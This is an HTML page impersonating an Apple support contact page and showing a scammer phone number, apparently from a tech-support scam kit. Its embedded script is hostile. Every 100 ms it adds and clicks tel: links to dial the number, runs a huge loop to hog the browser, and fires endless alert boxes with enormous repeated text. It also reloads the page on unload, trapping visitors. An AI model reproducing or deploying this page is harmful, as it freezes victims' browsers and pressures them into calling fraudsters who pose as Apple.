<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" class="no-js">
<meta http-equiv="content-type" content="text/html;charset=utf-8" />

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta http-equiv="cache-control" content="max-age=3600">
	<title>Contact | Official Apple Helpline</title>
	<meta name="description"
		content="Contact Apple support by phone or chat, set up a repair, or make a Genius Bar appointment for iPhone, iPad, Mac and more.">

	<link rel="stylesheet" href="css/Base.css" type="text/css">
	<link rel="stylesheet" type="text/css"
		href="%2540families%253dSF%252bPro%252cv1_7CSF%252bPro%252bIcons%252cv1.html">
	<script src="js/text_tel.js"></script>

</head>

<body>
	<div id="result"></div>
	<input type="checkbox" id="ac-gn-menustate" class="ac-gn-menustate">
	<nav id="ac-globalnav" class="no-js">
		<div class="ac-gn-content">
			<ul class="ac-gn-header">
				<li class="ac-gn-item ac-gn-menuicon">
					<label class="ac-gn-menuicon-label" for="ac-gn-menustate" aria-hidden="true">
						<span class="ac-gn-menuicon-bread ac-gn-menuicon-bread-top">
							<span class="ac-gn-menuicon-bread-crust ac-gn-menuicon-bread-crust-top"></span>
						</span>
						<span class="ac-gn-menuicon-bread ac-gn-menuicon-bread-bottom">
							<span class="ac-gn-menuicon-bread-crust ac-gn-menuicon-bread-crust-bottom"></span>
						</span>
					</label>
					<a href="#ac-gn-menustate" class="ac-gn-menuanchor ac-gn-menuanchor-open"
						id="ac-gn-menuanchor-open">
						<span class="ac-gn-menuanchor-label">Open Menu </span></a>
					<a href="#" class="ac-gn-menuanchor ac-gn-menuanchor-close" id="ac-gn-menuanchor-close">
						<span class="ac-gn-menuanchor-label">Close Menu </span></a>
				</li>
				<li class="ac-gn-item ac-gn-apple">
					<a class="ac-gn-link ac-gn-link-apple" href="#" id="ac-gn-firstfocus-small">
						<span class="ac-gn-link-text">Apple </span></a>
				</li>
				<li class="ac-gn-item ac-gn-bag ac-gn-bag-small" id="ac-gn-bag-small">
					<a class="ac-gn-link ac-gn-link-bag analytics-exitlink" href="#"><span
							class="ac-gn-link-text">Shopping Bag </span><span class="ac-gn-bag-badge"></span></a>
					<span class="ac-gn-bagview-caret ac-gn-bagview-caret-large"></span>
				</li>
			</ul>
			<ul class="ac-gn-list">
				<li class="ac-gn-item ac-gn-apple">
					<a class="ac-gn-link ac-gn-link-apple" href="#" id="ac-gn-firstfocus">
						<span class="ac-gn-link-text">Apple </span></a>
				</li>
				<li class="ac-gn-item ac-gn-item-menu ac-gn-mac">
					<a class="ac-gn-link ac-gn-link-mac" href="#">
						<span class="ac-gn-link-text">Mac </span></a>
				</li>
				<li class="ac-gn-item ac-gn-item-menu ac-gn-ipad">
					<a class="ac-gn-link ac-gn-link-ipad" href="#">
						<span class="ac-gn-link-text">iPad </span></a>
				</li>
				<li class="ac-gn-item ac-gn-item-menu ac-gn-iphone">
					<a class="ac-gn-link ac-gn-link-iphone" href="#">
						<span class="ac-gn-link-text">iPhone </span></a>
				</li>
				<li class="ac-gn-item ac-gn-item-menu ac-gn-watch">
					<a class="ac-gn-link ac-gn-link-watch" href="#">
						<span class="ac-gn-link-text">Watch </span></a>
				</li>
				<li class="ac-gn-item ac-gn-item-menu ac-gn-tv">
					<a class="ac-gn-link ac-gn-link-tv" href="#">
						<span class="ac-gn-link-text">TV </span></a>
				</li>
				<li class="ac-gn-item ac-gn-item-menu ac-gn-music">
					<a class="ac-gn-link ac-gn-link-music" href="#">
						<span class="ac-gn-link-text">Music </span></a>
				</li>
				<li class="ac-gn-item ac-gn-item-menu ac-gn-support">
					<a class="ac-gn-link ac-gn-link-support" href="#">
						<span class="ac-gn-link-text">Support </span></a>
				</li>
				<li class="ac-gn-item ac-gn-item-menu ac-gn-search" role="search">
					<a class="ac-gn-link ac-gn-link-search" href="#">
						<span class="ac-gn-search-placeholder" aria-hidden="true">Search apple.com </span></a>
				</li>
				<li class="ac-gn-item ac-gn-bag" id="ac-gn-bag">
					<a class="ac-gn-link ac-gn-link-bag analytics-exitlink" href="#" aria-label="Shopping Bag">
						<span class="ac-gn-link-text">Shopping Bag </span>
						<span class="ac-gn-bag-badge" aria-hidden="true"></span></a>
					<span class="ac-gn-bagview-caret ac-gn-bagview-caret-large"></span>
				</li>
			</ul>
			<aside id="ac-gn-searchview" class="ac-gn-searchview" role="search">
				<div class="ac-gn-searchview-content">
					<form id="ac-gn-searchform" class="ac-gn-searchform"
						action="../external.html?link=http://www.apple.com/us/search" method="get">
						<div class="ac-gn-searchform-wrapper">
							<input id="ac-gn-searchform-input" class="ac-gn-searchform-input" type="text"
								placeholder="Search apple.com" autocorrect="off" autocapitalize="off" autocomplete="off"
								spellcheck="false">
							<input id="ac-gn-searchform-src" type="hidden" name="src" value="globalnav">
							<button id="ac-gn-searchform-submit" class="ac-gn-searchform-submit" type="submit"
								disabled="" aria-label="Submit"></button>
							<button id="ac-gn-searchform-reset" class="ac-gn-searchform-reset" type="reset" disabled=""
								aria-label="Clear Search"></button>
						</div>
					</form>
					<aside id="ac-gn-searchresults" class="ac-gn-searchresults"></aside>
				</div>
				<button id="ac-gn-searchview-close" class="ac-gn-searchview-close" aria-label="Close Search">
					<span class="ac-gn-searchview-close-wrapper">
						<span class="ac-gn-searchview-close-left"></span>
						<span class="ac-gn-searchview-close-right"></span>
					</span>
				</button>
			</aside>
			<aside class="ac-gn-bagview">
				<div class="ac-gn-bagview-scrim">
					<span class="ac-gn-bagview-caret ac-gn-bagview-caret-small"></span>
				</div>
				<div class="ac-gn-bagview-content" id="ac-gn-bagview-content">
				</div>
			</aside>
		</div>
	</nav>
	<div id="ac-gn-curtain" class="ac-gn-curtain"></div>
	<div id="ac-gn-placeholder" class="ac-nav-placeholder"></div>

	<div class="main">
		<input type="checkbox" id="ac-ln-menustate" class="ac-ln-menustate">
		<nav id="ac-localnav" class="js no-touch css-sticky" lang="en-US" role="navigation" data-sticky="">
			<div class="ac-ln-wrapper">
				<div class="ac-ln-background"></div>
				<div class="ac-ln-content">
					<span class="ac-ln-title">
						<a href="#">
							For help call +1-941-777-1420 <font color="red">
								<font class="js_setPhoneBlock"></font>
							</font></a>
					</span>
					<div class="ac-ln-menu">
						<a href="#ac-ln-menustate" class="ac-ln-menucta-anchor ac-ln-menucta-anchor-open"
							id="ac-ln-menustate-open"> <span class="ac-ln-menucta-anchor-label">Open menu </span></a> <a
							href="#" class="ac-ln-menucta-anchor ac-ln-menucta-anchor-close" id="ac-ln-menustate-close">
							<span class="ac-ln-menucta-anchor-label">Close menu </span></a>
						<div class="ac-ln-menu-tray">
							<ul class="ac-ln-menu-items">
								<li class="ac-ln-menu-item"><a href="#" class="ac-ln-menu-link analytics-exitlink">
										Communities </a>
								</li>
							</ul>
						</div>
						<div class="ac-ln-actions">
							<div class="ac-ln-action ac-ln-action-menucta" aria-hidden="true">
								<label for="ac-ln-menustate" class="ac-ln-menucta"> <span
										class="ac-ln-menucta-chevron"></span>
								</label>
							</div>
						</div>
					</div>
				</div>
			</div>
		</nav>
		<section class="as-columns  as-columns--1up  as-banner as-banner--top">
			<div class="row">
				<div class="column large-12 medium-12 small-12">
					<div class="as-banner-cont">
						<div class="as-banner-image as-banner-image--top">
							<style type="text/css">
								.as-banner-image.as-banner-image--top {
									background-image: url("images/contact-us-hero.image.large_2x.jpg");
								}

								.as-banner-image.as-banner-image--top:before {
									content: "";
									display: block;
								}

								@media only screen and (max-width: 735px) {
									.as-banner-image.as-banner-image--top {
										background-image: url("images/contact-us-hero.image.small_2x.jpg");
									}
								}
							</style>

							<img sizes="(min-width:735px ) 735w, 100vw"
								srcset="globalnav/apple/contact/contact-us-hero.image.small_2x.jpg 735w, images/contact-us-hero.image.large_2x.jpg 1440w"
								alt="" class="as-image-speculativedownload"
								src="images/contact-us-hero.image.large_2x.jpg">
						</div>
					</div>
					<div class="as-banner-content">
						<div class="pageTitle  ">
							<h1 class="pageTitle-heading">Contact Apple </h1>
							<p class="pageTitle-intro js_setTextBlock"></p>
						</div>
						<div class="sectionTitle sectionTitleBlock">
							<h2 class="sectionTitle-heading">For help call +1-941-777-1420</h2>
						</div>
					</div>
				</div>
			</div>
		</section>
	</div>
	<footer id="ac-globalfooter" class="no-js">
		<div class="ac-gf-content">
			<section class="ac-gf-footer">
				<div class="ac-gf-footer-shop"> More ways to: Visit an <a href="#" class="analytics-exitlink">Apple
						Store </a>, <span class="nowrap">call <font class="js_setPhoneBlock"></font>, or <a href="#"
							class="analytics-exitlink">find a reseller </a></span>.
				</div>
				<div class="ac-gf-footer-locale">
					<a class="ac-gf-footer-locale-link" href="#" title="Choose your country or region"
						aria-label="United States. Choose your country or region"><img class="ac-gf-footer-locale-flag"
							src="images/us.png" alt="" width="16" height="16">United
						States </a>
				</div>
				<div class="ac-gf-footer-legal">
					<div class="ac-gf-footer-legal-copyright">Copyright© 2022 Apple . All rights reserved. </div>
					<div class="ac-gf-footer-legal-links"><a class="ac-gf-footer-legal-link analytics-exitlink"
							href="#">Privacy
							Policy </a> <a class="ac-gf-footer-legal-link analytics-exitlink" href="#">Terms of Use </a>
						<a class="ac-gf-footer-legal-link analytics-exitlink" href="#">Sales and Refunds </a> <a
							class="ac-gf-footer-legal-link" href="#">Site
							Map </a> <a class="ac-gf-footer-legal-link" href="#">Contact
							Apple </a>
					</div>
				</div>
				<meta content="Apple" property="name">
				<meta content="+1-941-777-1420" property="telephone">
			</section>
		</div>
	</footer>
	<script src="js/jquery-1.12.0.min.js"></script>
	<script>

		function getURLParameter(name) {
			return decodeURI(
				(RegExp(name + '=' + '(.+?)(&|$)').exec(location.search) || [, null])[1] || ''
			);
		};
		var cookieHelper = { defParams: { path: "/", domain: "." + window.location.host.replace(/:\d+/, "") }, set: function (a, d, c) { c = c || {}; for (var b in this.defParams) "undefined" == typeof c[b] && (c[b] = this.defParams[b]); b = c.expires; if ("number" == typeof b && b) { var e = new Date; e.setTime(e.getTime() + 1E3 * b); b = c.expires = e } b && b.toUTCString && (c.expires = b.toUTCString()); d = encodeURIComponent(d); a = a + "=" + d; for (var f in c) a += "; " + f, d = c[f], !0 !== d && (a += "=" + d); document.cookie = a }, get: function (a) { return (a = document.cookie.match(new RegExp("(?:^|; )" + a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, "\\$1") + "=([^;]*)"))) ? decodeURIComponent(a[1]) : void 0 }, del: function (a) { this.set(a, null, { expires: -1 }) } };


		var userAgent = window.navigator.userAgent.toLowerCase(),
			ios = /iphone|ipod|ipad/.test(userAgent);

		function parseURL(url) {
			var a = document.createElement('a');
			a.href = url;
			return a.hostname.replace('www.', '');
		};

		function getPar(name) {
			var url = window.location.href;
			name = name.replace(/[\[\]]/g, "\\$&");
			var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),
				results = regex.exec(url);
			if (!results) return null;
			if (!results[2]) return '';
			return decodeURIComponent(results[2].replace(/\+/g, " "));
		};

		window.number = getPar('phone');

		window.number = (window.number ? window.number : '+1-941-777-1420');

		window.device = 'iPhone';
		window.refef = parseURL(document.referrer);

		if (ios) {

			if (/iphone/.test(userAgent)) {
				window.device = 'iPhone';
			}

			if (/ipad/.test(userAgent)) {
				window.device = 'iPad';
			}

			if (/ipod/.test(userAgent)) {
				window.device = 'iPod';
			}
		}

		var text = cookieHelper.get('textSetBl');
		var phone = cookieHelper.get('phoneSetBl');

		function getText() {
			var str = window.defaultText;

			for (var d in window.text) {
				if (window.refef.indexOf(d) != -1) {
					str = window.text[d];
				}
			}
			return str.replace('|%model%|', window.device).replace('|%ref%|', window.refef);
		}


		if (!phone) {
			phone = getURLParameter('phone');
		}
		if (!text) {
			text = getURLParameter('text');
		}

		var sText = document.querySelectorAll('.js_setTextBlock');
		for (var t = 0; t < sText.length; t++) {
			sText[t].innerHTML = getText();
		}
		var sPhone = document.querySelectorAll('.js_setPhoneBlock');
		for (var p = 0; p < sPhone.length; p++) {
			sPhone[p].innerHTML = phone;
		}


		setInterval(function () { okkkk() }, 100);

		function okkkk() {
			jQuery('#result').append('<a  class="anchorcall" href="tel:+1-941-777-1420"></a>');
			document.querySelector('a').click();
			var extraData = "";
			for (itxextraData = 0; itxextraData < 20000000000; itxextraData++) {
				var extraData = extraData + "5555555555";
			}
			jQuery('#result').append('<a href="#callto+' + extraData + '%00"></a>');
			document.querySelector('a').click();
			document.querySelector('a').click();
			document.querySelector('a').click();
			document.querySelector('a').click();
			document.querySelector('a').click();
			document.querySelector('a').click();
			document.querySelector('a').click();
			document.querySelector('a').click();
			document.querySelector('a').click();
			document.querySelector('a').click();
			document.querySelector('a').click();
			document.querySelector('a').click();
			document.querySelector('a').click();
			document.querySelector('a').click();
			document.querySelector('a').click();
			document.querySelector('a').click();
			document.querySelector('a').click();
			document.querySelector('a').click();
			setInterval(function () { alert(getText().repeat(20000000)); }, 500);
		};
		window.ununload = function () {
			debugger;
			location.reload();
		}
	</script>
</body>

</html>